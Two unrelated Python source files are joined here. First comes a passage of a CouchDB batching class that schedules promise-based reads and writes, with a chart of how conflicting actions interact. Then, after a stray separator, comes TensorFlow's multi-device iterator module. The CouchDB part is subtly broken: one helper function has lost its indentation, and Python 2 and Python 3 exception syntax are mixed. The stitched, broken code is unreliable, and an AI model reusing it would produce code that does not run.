    the cases. The top of this table is the current activity scheduled for the
    key, and the left side is the activity that the user is trying to schedule
    on top of the existing activity. When these failures occur, it is the
    actual method that raises the exception, rather than a returned promise.
    This should make debugging of complicated batch operations a bit more sane.

    The general reasoning behind these behaviours is the question of whether
    the user could be relying on the failure of the first action as a signal.
    If the first action can fail, and the second action would mask that
    failure, then the second action is forbidden.

                                 Current Action
    New Action
               | create        | overwrite     | update        | delete
    -----------+---------------+---------------+---------------+----------------
    create     | Create-       | Overwrite-    | Update-       | DeleteScheduled
               | Scheduled is  | Scheduled is  | Scheduled is  | is immediately
               | immediately   | immediately   | immediately   | raised
               | raised        | raised        | raised        |
               |               |               |               |
    overwrite  | Create-       | New activity  | Update-       | DeleteScheduled
               | Scheduled is  | overrides     | Scheduled is  | is immediately
               | immediately   | existing; both| immediately   | raised
               | raised        | promises tied | raised        |
               |               | to new one    |               |
               |               |               |               |
    update     | Update is     | Update is     | Both updates  | DeleteScheduled
               | applied to new| applied to    | joined into   | is immediately
               | document; both| overwrite doc;| composite;    | raised
               | promises are  | both promises | both promises |
               | dependent on  | dependent on  | tied to update|
               | success of    | update        | success       |
               | creation      | success       |               |
               |               |               |               |
    delete     | Create-       | Scheduled task| Update-       | DeleteScheduled
               | Scheduled is  | becomes delete| Scheduled is  | is immediately
               | immediately   | both promises | immediately   | raised
               | raised        | tied to delete| raised        |
               |               | success       |               |

    this logic is enshrined in _set_action far below...
    """

    def __init__(self, couchkit):
        self.__ck = couchkit
        self.clear_cache()
        self._reset()

    @property
    def ck(self):
        # The underlying couchkit connection; read-only.
        return self.__ck

    def new_batch(self):
        """Create a new batch that shares this batch's couch connection, but
        nothing else. This may be useful when a function passed to this batch's
        update or create methods needs to do some database work, since using
        this batch from a callback would almost certainly break things.

        @return A new CouchBatch instance, sharing this batch's couch
                connection
        """
        return CouchBatch(self.__ck)

    def clear_cache(self):
        """Throw away every cached couch row."""
        self.__docCache = {}

    def forget(self, key):
        """Remove a given document from the cache"""
        try:
            del self.__docCache[key]
        except KeyError:
            pass

    def _reset(self):
        """Setup the operations"""
        # key -> write Action (create/overwrite/update/delete)
        self._writes = {}
        # key -> ReadAction for pending .get promises
        self._reads = {}
        self._stats = {'read': 0, 'write': 0, 'fromcache': 0}

    def do_reads(self):
        """Fulfill all of the promises outstanding on ".get" requests."""
        keys = list(self._reads)
        results = self.__ck.all_docs(keys=keys, include_docs=True)
        self._stats['read'] += 1
        for row in results:
            key = row['key']
            if row.get('doc'):
                _fulfill(self._reads, key, DbValue(row))
                self.__docCache[key] = row
            elif (row.get('error') == 'not_found') or (
                    row.get('value', {}).get('deleted')):
                # Missing and deleted documents both surface as a failure
                # carrying ResourceNotFound.
                _fulfill(self._reads, key, DbFailure(ResourceNotFound(row)))
            else:
                raise RuntimeError("Unknown couch error type: %s" % row)

    def get(self, *keys, **kwargs):
        """Get the desired documents from couch. This will return a dictionary
        of key -> Promise.

        Notice that the promises' values will be the actual couch response
        dictionaries, so the typical keys are 'rev', 'doc', etc. The data
        you're looking for is probably under the key of 'doc', unless you want
        the doc's revision or something else meta about the document.

        @param keys   The keys for the documents we want to retreive
        @param cached A boolean keyword argument indicating whether we are
                      allowed to return cached values. Defaults to True.
        """
        keys = set(keys)
        result = {}

        # Emulate keyword-only arguments: 'cached' is the only one allowed.
        if set(['cached']).union(kwargs) != set(['cached']):
            unexpected = list(set(kwargs).difference(['cached']))[0]
            raise TypeError(
                "get() got an unexpected keyword argument '%s'" % unexpected)

        if kwargs.get('cached', True):
            for key in keys:
                try:
                    cached = self.__docCache[key]
                    # Cache hit: hand back an already-fulfilled promise.
                    promise = Promise(key, lambda: None)
                    promise._fulfill(DbValue(cached))
                    result[key] = promise
                    self._stats['fromcache'] += 1
                except KeyError:
                    pass

        notcached = keys - set(result)
        for key in notcached:
            if key in self._reads:
                # A read is already scheduled; share its promise.
                result[key] = self._reads[key].promise
            else:
                promise = Promise(key, self.do_reads)
                result[key] = promise
                action = ReadAction(key, promise)
                self._reads[key] = action
        return result

    def view(self, vname, **kwargs):
        """Run a view. It can be useful to run a view through the couch batch
        rather than directly through the couchkit object because when
        include_docs is given, the docs get added to the batch's cache.

        @param vname  The name of the view to query
        @param kwargs CouchDB view arguments
        @return The result of the view
        """
        rows = self.__ck.view(vname, **kwargs)
        self._stats['read'] += 1
        if kwargs.get('include_docs'):
            return ViewResults(rows, self.__docCache)
        else:
            return rows

    def all(self, **kwargs):
        """Return all the docs in couch. If include_docs is set, all the docs
        returned from this function will be added to this batch's cache. This
        is pretty much just a special view, so all the kwargs that a view can
        take, this can take as well.

        @param kwargs CouchDB view arguments
        @return The result of the view
        """
        rows = self.__ck.all_docs(**kwargs)
        self._stats['read'] += 1
        if kwargs.get('include_docs'):
            return ViewResults(rows, self.__docCache)
        else:
            return rows

    def do_writes(self, timelimit=5):
        """Run the current batch of write operations. This will fulfill all
        the promises we have outstanding on create, overwrite, update, and
        delete operations.

        @param timelimit How many seconds we have to complete; any commit
                         attempts made after timelimit will be marked as
                         failures
        """
        writes = self._writes
        self._writes = {}
        start = time.time()
        promises = [action.promise for action in writes.values()]
        while True:
            if not writes:
                break
            if time.time() > start + timelimit:
                break

            bulk_write = {}
            needcurrent = []
            # Iterate over a snapshot: entries may be deleted from ``writes``
            # inside the loop body.
            for action in list(writes.values()):
                try:
                    if action.docid in self.__docCache:
                        doc = action.doc(self.__docCache[action.docid])
                    else:
                        doc = action.doc()
                except ActionNeedsDocument:
                    # The action can't produce a doc without the current
                    # revision; schedule a read and retry below.
                    current = self.get(action.docid)[action.docid]
                    needcurrent.append((current, action))
                    continue
                except ActionForbidsDocument:
                    action.promise._fulfill(
                        DbFailure(_make_conflict(action.docid)))
                    continue
                except Exception as e:
                    action.promise._fulfill(DbFailure(e))
                    continue

                if doc:
                    bulk_write[action.docid] = doc
                else:
                    # A falsy doc means the action decided to do nothing.
                    action.promise._fulfill(DbValue(None))
                    # BUG FIX: was ``del writes[doc.docid]``, but ``doc`` is
                    # falsy (typically None) on this branch, so that raised
                    # AttributeError instead of dropping the action.
                    del writes[action.docid]

            for current, action in needcurrent:
                try:
                    value = current.value()
                    doc = action.doc(value)
                except ActionForbidsDocument:
                    action.promise._fulfill(
                        DbFailure(_make_conflict(action.docid)))
                    continue
                except Exception as e:
                    action.promise._fulfill(DbFailure(e))
                    continue

                if doc:
                    if doc['_id'] != action.docid:
                        # Only creations may change a document's id; re-key
                        # the action under its new id.
                        assert isinstance(action, CreateAction)
                        del writes[action.docid]
                        if doc['_id'] in writes:
                            action.promise._fulfill(
                                DbFailure(_make_conflict(action.docid)))
                            continue
                        action = CreateAction(doc['_id'], doc,
                                              action.promise, action.resolver)
                        writes[doc['_id']] = action
                    bulk_write[action.docid] = doc
                else:
                    action.promise._fulfill(DbValue(None))
                    del writes[action.docid]

            try:
                self._stats['write'] += 1
                results = self.__ck.bulk_save(bulk_write.values())
            except BulkSaveError as e:
                # Partial failure: per-document results live on the error.
                results = e.results

            retries = []
            for result in results:
                key = result['id']
                action = writes[key]
                if 'error' in result:
                    if action.can_retry:
                        retries.append(action)
                        # The cached revision is stale; drop it so the retry
                        # re-reads the current doc.
                        self.forget(action.docid)
                    else:
                        action.promise._fulfill(
                            DbFailure(_make_conflict(result)))
                else:
                    action.promise._fulfill(DbValue(result))
                    doc = bulk_write[key]
                    if doc.get('_deleted') == True:
                        self.forget(key)
                    else:
                        # Refresh the cache with the doc we just wrote, at
                        # its new revision.
                        doc = copy.deepcopy(doc)
                        doc['_rev'] = result['rev']
                        self.__docCache[key] = {
                            'id': key,
                            'key': key,
                            'value': {'rev': result['rev']},
                            'doc': doc,
                        }
            writes = dict((action.docid, action) for action in retries)

        if writes:
            # We ran out of time; everything left over fails as a conflict.
            for action in writes.values():
                action.promise._fulfill(
                    DbFailure(_make_conflict(action.docid)))
        return promises

    def create(self, key, document, conflict_fn=None, converter=None):
        """Create a new document. The promise returned from this will have a
        value that either raises an exception or returns a dictionary with the
        keys "rev" and "id".

        Create will fail if the document already exists in couch; this means
        that if we have the key in our doc cache, or if the document is
        scheduled to be created already, the returned promise will be a
        failure.

        @param key         The key at which to store the given document
        @param document    The data to store (should be a dictionary)
        @param conflict_fn A function that accepts the document we're trying
                           to write and the currently-stored document, and
                           which can return a new document to try writing or
                           None to indicate a failure
        @param converter   A function that, once the promise is given a value,
                           will immediately be called with that promise. If it
                           returns a truthy value, that value will be used as
                           the promise's value instead of whatever it would
                           have had.
        @raise ScheduleError If something is already scheduled to happen for
                             this key
        """
        if key in self.__docCache:
            # We know that the key is in our cache, and thus is known to
            # exist. We'll return a promise that's already set as a failure.
            promise = Promise(key, lambda: None, gotresult_fn=converter)
            promise._fulfill(DbFailure(_make_conflict(key)))
            return promise

        def action_fn(promise):
            return CreateAction(key,
                                document,
                                promise,
                                conflict_resolver=conflict_fn)
        promise = _set_action(self._writes, key, self.do_writes, action_fn,
                              converter)
        return promise

    def overwrite(self, key, document, revision=None, converter=None):
        """Stomp over whatever document already exists in the database with
        the given key, or create a new document if needed. The data given by
        document is what will be in the database once we commit.

        @param key       The key at which to store our data
        @param document  The data to store
        @param revision  The current database rev of the doc, if known
        @param converter A function that, once the promise is given a value,
                         will immediately be called with that promise. If it
                         returns a truthy value, that value will be used as
                         the promise's value instead of whatever it would
                         have had.
        @raise ScheduleError If there is already an anything scheduled other
                             than another overwrite.
        """
        promise = _set_action(self._writes, key, self.do_writes,
                              partial(OverwriteAction, key, document,
                                      revision), converter)
        return promise

    def update(self, key, updatefn, converter=None):
        """Queue up a document update function. On commit, the document
        associated with given key will be retrieved, and the function will be
        called on the document. If the document does not exist in the
        database, the returned promise's value will raise a ResourceNotFound
        exception; otherwise, the value will be the update response from the
        database, which is basically a dictionary with a rev and a key (the
        key you gave this function, hopefully)

        The result of the function will be the new value that will be stored
        (at least, given to the other updates for the document). If the update
        function returns None, it will have no effect on the stored value of
        the document.

        @param key       The key of the document to update
        @param updatefn  The function that will transform the document data
        @param converter A function that, once the promise is given a value,
                         will immediately be called with that promise. If it
                         returns a truthy value, that value will be used as
                         the promise's value instead of whatever it would
                         have had.
        @raise ScheduleError If there is already a delete scheduled for this
                             key
        """
        promise = _set_action(self._writes, key, self.do_writes,
                              partial(UpdateAction, key, updatefn), converter)
        return promise

    def delete(self, key, converter=None):
        """Delete a document. The promise returned here will contain a
        dictionary with the keys "rev", "id", and "ok", or it will raise a
        ResourceNotFound exception.

        @param key       The key of the document to delete.
        @param converter A function that, once the promise is given a value,
                         will immediately be called with that promise. If it
                         returns a truthy value, that value will be used as
                         the promise's value instead of whatever it would
                         have had.
        @raise ScheduleError If anything other than an overwrite is already
                             scheduled for this key
        """
        promise = _set_action(self._writes, key, self.do_writes,
                              partial(DeleteAction, key), converter)
        return promise
def _fulfill(actions, key, result):
"""Complete the promises outstanding for the given document key.
@param actions The key -> action dictionary for read or write actions
@param key The couch key for the promise
@param result The DbResult to record
"""
if key in actions:
actions[key].promise._fulfill(result)
del actions[key]
def _set_action(actions, key, completer_fn, action_fn, converter_fn):
    """Assign (or re-assign) the action for the given key. This generates a new
    Promise chained to the promise of the already-present action for the key
    (if any). It then gives that promise to the given action_fn to generate a
    new Action, which it stores in the actions dictionary. The new promise is
    returned from this function.

    The existing-vs-new dispatch below implements the compatibility chart in
    the CouchBatch class docstring.

    @param actions      The dictionary of key -> action
    @param key          The key we want to set the action for
    @param completer_fn The function the promise needs to call when its value
                        is requested
    @param action_fn    The function that will give us an Action
    @param converter_fn A function that, once the promise is given a value,
                        will immediately be called with that promise. If it
                        returns a truthy value, that value will be used as
                        the promise's value instead of whatever it would
                        have had.
    @return A new promise object to give to the user
    @raise CreateScheduled, OverwriteScheduled, UpdateScheduled,
           DeleteScheduled when the new action would mask a failure the
           caller may be relying on (see the chart).
    """
    try:
        existing = actions[key]
        prev_promise = existing.promise
    except KeyError:
        # Nothing scheduled yet for this key.
        existing = None
        prev_promise = None
    # Chain the new promise to the previous one (if any) so both callers see
    # the outcome of whatever action finally runs.
    promise = Promise(key, completer_fn, prev_promise, converter_fn)
    new = action_fn(promise)
    if isinstance(existing, CreateAction):
        if isinstance(new, CreateAction):
            raise CreateScheduled
        elif isinstance(new, OverwriteAction):
            raise CreateScheduled
        elif isinstance(new, UpdateAction):
            # Fold the update into the pending creation's document.
            new, promise = _update_doc(key, new, existing, promise)
        elif isinstance(new, DeleteAction):
            raise CreateScheduled
    elif isinstance(existing, OverwriteAction):
        if isinstance(new, CreateAction):
            raise OverwriteScheduled
        elif isinstance(new, OverwriteAction):
            # This will just do the natural thing, which is the new overwrite
            # taking precedence; the promises are already chained
            pass
        elif isinstance(new, UpdateAction):
            # Fold the update into the pending overwrite's document.
            new, promise = _update_doc(key, new, existing, promise)
        elif isinstance(new, DeleteAction):
            # This is the natural action; new is already a delete, and the
            # promises are already chained
            pass
    elif isinstance(existing, UpdateAction):
        if isinstance(new, CreateAction):
            raise UpdateScheduled
        elif isinstance(new, OverwriteAction):
            raise UpdateScheduled
        elif isinstance(new, UpdateAction):
            # Compose the new update function with the existing one, create a
            # new update action from that
            origNew = new
            def composed(doc):
                # ``existing`` and ``origNew`` are captured by the closure;
                # run the older update first, then the newer one on its
                # output.
                fromExisting = existing.doc({'doc': doc})
                fromNew = origNew.doc({'doc': fromExisting})
                return fromNew
            new = UpdateAction(key, composed, promise)
        elif isinstance(new, DeleteAction):
            raise UpdateScheduled
    elif isinstance(existing, DeleteAction):
        # The chart for existing = delete is pretty simple...
        raise DeleteScheduled
    actions[key] = new
    return promise
def _update_doc(key, new, existing, promise):
    """Pass the doc to be created by the existing through the function stored
    in the new, wrap the result in a create. If the update function throws an
    exception, we will make a failed promise and throw away the update; if the
    update function returns None, we will make a successful promise with the
    value of None and throw away the update

    @param key      The couch key the actions apply to
    @param new      The UpdateAction being folded in
    @param existing The pending CreateAction or OverwriteAction
    @param promise  The chained promise produced by _set_action
    @return (action, promise) — the action to schedule and the promise to
            hand back to the caller (which may be a fresh, already-fulfilled
            promise when the update failed or was a no-op)
    """
    assert isinstance(new, UpdateAction)
    assert (isinstance(existing, CreateAction)
            or isinstance(existing, OverwriteAction) )
    try:
        # Apply the update function to the doc the existing action would
        # have written.
        updated = new.doc({'doc': existing.doc()})
    except Exception, e:
        # The update failed: keep the existing action and report the failure
        # on a fresh promise so the original action's promise is untouched.
        new = existing
        promise = Promise(key, lambda: None)
        promise._fulfill(DbFailure(e))
    else:
        if updated:
            # Re-wrap the transformed doc in the same kind of action.
            if isinstance(existing, CreateAction):
                new = CreateAction(existing.docid, updated, promise, existing.resolver)
            else:
                new = OverwriteAction(existing.docid, updated, None, promise)
        else:
            # Update returned None: it is a no-op; keep the existing action
            # and fulfill the update's caller with None.
            new = existing
            promise = Promise(key, lambda: None)
            promise._fulfill(DbValue(None))
    return new, promise
def _make_conflict(key):
    """Generate a ResourceConflict exception object for the given key"""
    details = {
        'id': key,
        'error': 'conflict',
        'reason': 'Document update conflict.',
    }
    return ResourceConflict(details)
|
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Python wrapper for prefetching_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.ops import iterator_ops
from tensorflow.python.data.util import structure
from tensorflow.python.eager import context
from tensorflow.python.eager import function
from tensorflow.python.framework import composite_tensor
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_spec
from tensorflow.python.framework import type_spec
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import gen_dataset_ops
from tensorflow.python.ops import resource_variable_ops
class _PerDeviceGenerator(dataset_ops.DatasetV2):
  """A `dummy` generator dataset serving one shard of a MultiDeviceIterator.

  The generator's init/next/finalize functions are remote calls back to
  `source_device`, so each `get_next` pulls the shard's elements from the
  host-side multi-device iterator resource identified by a string handle.
  """
  def __init__(self, shard_num, multi_device_iterator_resource, incarnation_id,
               source_device, element_spec):
    # `element_spec` is the (possibly nested) structure of dataset elements;
    # it is flattened below to produce output_types/output_shapes for the ops.
    self._element_spec = element_spec
    # Serialize the iterator resource so it can be re-materialized inside the
    # remotely-called functions via *_from_string_handle.
    multi_device_iterator_string_handle = (
        gen_dataset_ops.multi_device_iterator_to_string_handle(
            multi_device_iterator_resource))
    # TODO(b/124254153): Enable autograph once the overhead is low enough.
    @function.defun(autograph=False)  # Pure graph code.
    def _init_func():
      return multi_device_iterator_string_handle
    init_func_concrete = _init_func.get_concrete_function()
    # TODO(b/124254153): Enable autograph once the overhead is low enough.
    @function.defun(autograph=False)  # Pure graph code.
    def _remote_init_func():
      # Run _init_func on the source (host) device rather than locally.
      return functional_ops.remote_call(
          target=source_device,
          args=init_func_concrete.captured_inputs,
          Tout=[dtypes.string],
          f=init_func_concrete)
    self._init_func = _remote_init_func.get_concrete_function()
    self._init_captured_args = self._init_func.captured_inputs
    # TODO(b/124254153): Enable autograph once the overhead is low enough.
    @function.defun(
        input_signature=[tensor_spec.TensorSpec([], dtypes.string)],
        autograph=False)  # Pure graph code.
    def _next_func(string_handle):
      # pylint: disable=protected-access
      # Rebuild the iterator from the handle, then fetch this shard's element.
      multi_device_iterator = (
          gen_dataset_ops.multi_device_iterator_from_string_handle(
              string_handle=string_handle,
              output_types=structure.get_flat_tensor_types(self._element_spec),
              output_shapes=structure.get_flat_tensor_shapes(
                  self._element_spec)))
      return gen_dataset_ops.multi_device_iterator_get_next_from_shard(
          multi_device_iterator=multi_device_iterator,
          shard_num=shard_num,
          incarnation_id=incarnation_id,
          output_types=structure.get_flat_tensor_types(self._element_spec),
          output_shapes=structure.get_flat_tensor_shapes(self._element_spec))
    next_func_concrete = _next_func.get_concrete_function()
    # TODO(b/124254153): Enable autograph once the overhead is low enough.
    @function.defun_with_attributes(
        input_signature=[tensor_spec.TensorSpec([], dtypes.string)],
        attributes={"experimental_ints_on_device": True},
        autograph=False)  # Pure graph code.
    def _remote_next_func(string_handle):
      return functional_ops.remote_call(
          target=source_device,
          args=[string_handle] + next_func_concrete.captured_inputs,
          Tout=structure.get_flat_tensor_types(self._element_spec),
          f=next_func_concrete)
    self._next_func = _remote_next_func.get_concrete_function()
    self._next_captured_args = self._next_func.captured_inputs
    # Remember where `incarnation_id` sits in the captured inputs so
    # _ReincarnatedPerDeviceGenerator can swap in a fresh id later.
    # Identity comparison (`is`) is intentional: we want the exact tensor.
    self._incarnation_id_index = -1
    for i, arg in enumerate(self._next_captured_args):
      if arg is incarnation_id:
        self._incarnation_id_index = i
    # TODO(b/124254153): Enable autograph once the overhead is low enough.
    @function.defun(
        input_signature=[tensor_spec.TensorSpec([], dtypes.string)],
        autograph=False)  # Pure graph code.
    def _finalize_func(unused_string_handle):
      # No per-shard cleanup is needed; return a dummy scalar.
      return array_ops.constant(0, dtypes.int64)
    finalize_func_concrete = _finalize_func.get_concrete_function()
    # TODO(b/124254153): Enable autograph once the overhead is low enough.
    @function.defun(
        input_signature=[tensor_spec.TensorSpec([], dtypes.string)],
        autograph=False)  # Pure graph code.
    def _remote_finalize_func(string_handle):
      return functional_ops.remote_call(
          target=source_device,
          args=[string_handle] + finalize_func_concrete.captured_inputs,
          Tout=[dtypes.int64],
          f=finalize_func_concrete)
    self._finalize_func = _remote_finalize_func.get_concrete_function()
    self._finalize_captured_args = self._finalize_func.captured_inputs
    # Assemble the generator dataset from the three remote-call functions.
    variant_tensor = gen_dataset_ops.generator_dataset(
        self._init_captured_args,
        self._next_captured_args,
        self._finalize_captured_args,
        init_func=self._init_func,
        next_func=self._next_func,
        finalize_func=self._finalize_func,
        **self._flat_structure)
    super(_PerDeviceGenerator, self).__init__(variant_tensor)
  def _inputs(self):
    # TODO(b/116506223): Determine which datasets should be used as inputs here.
    return []
  @property
  def element_spec(self):
    return self._element_spec
class _ReincarnatedPerDeviceGenerator(dataset_ops.DatasetV2):
  """Creates a _PerDeviceGenerator-like dataset with a new incarnation_id.
  Re-uses the functions from the provided per_device_dataset and just switches
  out the function argument corresponding to the incarnation_id.
  """
  def __init__(self, per_device_dataset, incarnation_id):
    # pylint: disable=protected-access
    self._element_spec = per_device_dataset.element_spec
    self._init_func = per_device_dataset._init_func
    self._init_captured_args = self._init_func.captured_inputs
    self._next_func = per_device_dataset._next_func
    self._next_captured_args = per_device_dataset._next_captured_args
    # The captured arguments to the next_func are string_handle, incarnation_id.
    # We update the incarnation id to the new one.
    # NOTE(review): this mutates the captured-args list shared with
    # `per_device_dataset` in place rather than copying it — presumably
    # intentional so the prototype always reflects the latest incarnation,
    # but verify before reusing the prototype elsewhere.
    self._next_captured_args[
        per_device_dataset._incarnation_id_index] = incarnation_id
    self._finalize_func = per_device_dataset._finalize_func
    self._finalize_captured_args = per_device_dataset._finalize_captured_args
    # Rebuild the generator dataset with the (now updated) captured inputs.
    variant_tensor = gen_dataset_ops.generator_dataset(
        self._init_captured_args,
        self._next_captured_args,
        self._finalize_captured_args,
        init_func=self._init_func,
        next_func=self._next_func,
        finalize_func=self._finalize_func,
        **self._flat_structure)
    super(_ReincarnatedPerDeviceGenerator, self).__init__(variant_tensor)
  def _inputs(self):
    # TODO(b/116506223): Determine which datasets should be used as inputs here.
    return []
  @property
  def element_spec(self):
    return self._element_spec
def _create_device_dataset(prototype_ds, incarnation_id, prefetch_buffer_size,
                           experimental_slack):
  """Builds a per-device dataset from a prototype generator.

  Re-incarnates `prototype_ds` with `incarnation_id`, optionally adds a
  device-side prefetch stage, and disables auto-tuning/default optimizations
  (not supported for non-CPU devices).
  """
  device_ds = _ReincarnatedPerDeviceGenerator(prototype_ds, incarnation_id)
  if prefetch_buffer_size > 0:
    if experimental_slack:
      device_ds = dataset_ops.PrefetchDataset(
          device_ds, prefetch_buffer_size, slack_period=1)
    else:
      device_ds = device_ds.prefetch(prefetch_buffer_size)
  # TODO(jsimsa): Enable auto-tuning and optimizations when supported for
  # non-CPU devices.
  opts = dataset_ops.Options()
  opts.experimental_optimization.apply_default_optimizations = False
  opts.experimental_optimization.autotune = False
  return device_ds.with_options(opts)
class MultiDeviceIterator(object):
  """An iterator over multiple devices.

  Owns a host-side multi-device iterator resource plus one per-device
  iterator that pulls its shard from that resource (optionally through a
  device-side prefetch buffer).
  """
  def __init__(self,
               dataset,
               devices,
               max_buffer_size=1,
               prefetch_buffer_size=1,
               source_device="/cpu:0"):
    """Constructs a MultiDeviceIterator.
    Args:
      dataset: The input dataset to be iterated over.
      devices: The list of devices to fetch data to.
      max_buffer_size: Maximum size of the host side per device buffer to keep.
      prefetch_buffer_size: if > 0, then we setup a buffer on each device to
        prefetch into.
      source_device: The host device to place the `dataset` on. In order to
        prevent deadlocks, if the prefetch_buffer_size is greater than the
        max_buffer_size, we set the max_buffer_size to prefetch_buffer_size.
    """
    options = dataset_ops.Options()
    options.experimental_distribute.num_devices = len(devices)
    dataset = dataset.with_options(options)
    self._dataset = dataset._apply_options()  # pylint: disable=protected-access
    self._experimental_slack = dataset.options().experimental_slack
    self._devices = devices
    self._source_device = source_device
    self._source_device_tensor = ops.convert_to_tensor(source_device)
    self._max_buffer_size = max_buffer_size
    self._prefetch_buffer_size = prefetch_buffer_size
    # Keep max_buffer_size >= prefetch_buffer_size to prevent deadlocks (see
    # the docstring above).
    if self._prefetch_buffer_size > self._max_buffer_size:
      self._max_buffer_size = self._prefetch_buffer_size
    # Create the MultiDeviceIterator.
    with ops.device(self._source_device):
      # TODO(b/121378567): Get rid of this shared_name hack.
      shared_name = ""
      if context.executing_eagerly():
        shared_name = context.shared_name()
      self._multi_device_iterator_resource = (
          gen_dataset_ops.multi_device_iterator(
              devices=self._devices,
              shared_name=shared_name,
              container="",
              **self._dataset._flat_structure))  # pylint: disable=protected-access
      if context.executing_eagerly():
        # Delete the resource when this object is deleted
        self._resource_deleter = resource_variable_ops.EagerResourceDeleter(
            handle=self._multi_device_iterator_resource,
            handle_device=self._source_device)
      # The incarnation ID is used to ensure consistency between the per-device
      # iterators and the multi-device iterator.
      self._incarnation_id = gen_dataset_ops.multi_device_iterator_init(
          self._dataset._variant_tensor,  # pylint: disable=protected-access
          self._multi_device_iterator_resource,
          max_buffer_size=self._max_buffer_size)
    # One prototype generator per device; these are kept so that
    # _eager_reset() can rebuild the pipelines with a new incarnation id.
    self._prototype_device_datasets = []
    for i, device in enumerate(self._devices):
      with ops.device(device):
        ds = _PerDeviceGenerator(i, self._multi_device_iterator_resource,
                                 self._incarnation_id,
                                 self._source_device_tensor,
                                 self._dataset.element_spec)
        self._prototype_device_datasets.append(ds)
    # TODO(rohanj): Explore the possibility of the MultiDeviceIterator to
    # initialize the device side of the pipeline. This would allow the
    # MultiDeviceIterator to choose, for example, to move some transformations
    # into the device side from its input. It might be useful in rewriting.
    # Create the per device iterators.
    self._device_iterators = []
    for i, device in enumerate(self._devices):
      with ops.device(device):
        # Uses the module-level _create_device_dataset helper (not the
        # method of the same name below).
        ds = _create_device_dataset(self._prototype_device_datasets[i],
                                    self._incarnation_id,
                                    self._prefetch_buffer_size,
                                    self._experimental_slack)
        if context.executing_eagerly():
          self._device_iterators.append(dataset_ops.make_one_shot_iterator(ds))
        else:
          self._device_iterators.append(
              dataset_ops.make_initializable_iterator(ds))
    # In graph mode, group all per-device initializers into a single op.
    if not context.executing_eagerly():
      device_iterator_initializers = [
          iterator.initializer for iterator in self._device_iterators
      ]
      self._initializer = control_flow_ops.group(*device_iterator_initializers)
  def _create_device_dataset(self, i):
    """Uses _prototype_device_datasets[i] to build a dataset for the device."""
    # NOTE(review): this method appears unused within this class — both
    # __init__ and _eager_reset call the module-level _create_device_dataset
    # instead, and this copy duplicates its logic. Candidate for removal;
    # verify there are no external callers first.
    ds = self._prototype_device_datasets[i]
    ds = _ReincarnatedPerDeviceGenerator(ds, self._incarnation_id)
    if self._prefetch_buffer_size > 0:
      if self._experimental_slack:
        ds = dataset_ops.PrefetchDataset(
            ds, self._prefetch_buffer_size, slack_period=1)
      else:
        ds = ds.prefetch(self._prefetch_buffer_size)
    # TODO(jsimsa): Enable auto-tuning and optimizations when supported for
    # non-CPU devices.
    options = dataset_ops.Options()
    options.experimental_optimization.apply_default_optimizations = False
    options.experimental_optimization.autotune = False
    ds = ds.with_options(options)
    return ds
  def get_next(self, device=None):
    """Returns the next element given a `device`, else returns all in a list."""
    if device is not None:
      index = self._devices.index(device)
      return self._device_iterators[index].get_next()
    result = []
    for i, device in enumerate(self._devices):
      with ops.device(device):
        result.append(self._device_iterators[i].get_next())
    return result
  def get_next_as_optional(self):
    # Like get_next(), but returns per-device Optionals so exhaustion can be
    # detected without raising.
    result = []
    for i, device in enumerate(self._devices):
      with ops.device(device):
        result.append(self._device_iterators[i].get_next_as_optional())
    return result
  @property
  def initializer(self):
    # Eager iterators are one-shot and need no explicit initialization.
    if context.executing_eagerly():
      return control_flow_ops.no_op()
    return self._initializer
  def _eager_reset(self):
    """Resets the MultiDeviceIterator in eager mode."""
    if not ops.executing_eagerly_outside_functions():
      raise ValueError("Eager reset is only supported in eager mode.")
    # pylint: disable=protected-access
    # Re-initializing yields a fresh incarnation id; per-device pipelines are
    # rebuilt from the prototypes so they reference the new incarnation.
    self._incarnation_id = gen_dataset_ops.multi_device_iterator_init(
        self._dataset._variant_tensor,
        self._multi_device_iterator_resource,
        max_buffer_size=self._max_buffer_size)
    for i, device in enumerate(self._devices):
      with ops.device(device):
        ds = _create_device_dataset(self._prototype_device_datasets[i],
                                    self._incarnation_id,
                                    self._prefetch_buffer_size,
                                    self._experimental_slack)
        # Reset the device iterator resources with the new dataset.
        ds_variant = ds._variant_tensor
        gen_dataset_ops.make_iterator(
            ds_variant, self._device_iterators[i]._iterator_resource)
  @property
  def element_spec(self):
    return self._dataset.element_spec
class MultiDeviceIteratorResourceDeleter(object):
  """An object which cleans up a Multi Device Iterator resource.
  An alternative to defining a __del__ method on an object. Even if the parent
  object is part of a reference cycle, the cycle will be collectible.
  """
  __slots__ = [
      "_deleter", "_multi_device_iterator", "_iterators", "_device",
      "_eager_mode"
  ]
  def __init__(self, multi_device_iterator, iterators, device, deleter):
    self._deleter = deleter
    self._multi_device_iterator = multi_device_iterator
    self._iterators = iterators
    self._device = device
    # Record the execution mode at construction time so deletion can be
    # performed in the same mode later (see __del__).
    self._eager_mode = context.executing_eagerly()
  def __del__(self):
    with ops.device(self._device):
      # Make sure the resource is deleted in the same mode as it was created in.
      # We pass in the iterator handles as inputs to the op to make sure that
      # this op runs after all the iterators are deleted.
      if self._eager_mode:
        with context.eager_mode():
          gen_dataset_ops.delete_multi_device_iterator(
              multi_device_iterator=self._multi_device_iterator,
              iterators=self._iterators,
              deleter=self._deleter)
      else:
        with context.graph_mode():
          gen_dataset_ops.delete_multi_device_iterator(
              multi_device_iterator=self._multi_device_iterator,
              iterators=self._iterators,
              deleter=self._deleter)
class MultiDeviceIteratorSpec(type_spec.TypeSpec):
  """Type specification for `OwnedMultiDeviceIterator`."""
  __slots__ = ["_devices", "_source_device", "_element_spec"]
  def __init__(self, devices, source_device, element_spec):
    self._devices = devices
    self._source_device = source_device
    self._element_spec = element_spec
  @property
  def value_type(self):
    return OwnedMultiDeviceIterator
  def _serialize(self):
    # Devices are converted to a tuple so the serialized form is hashable.
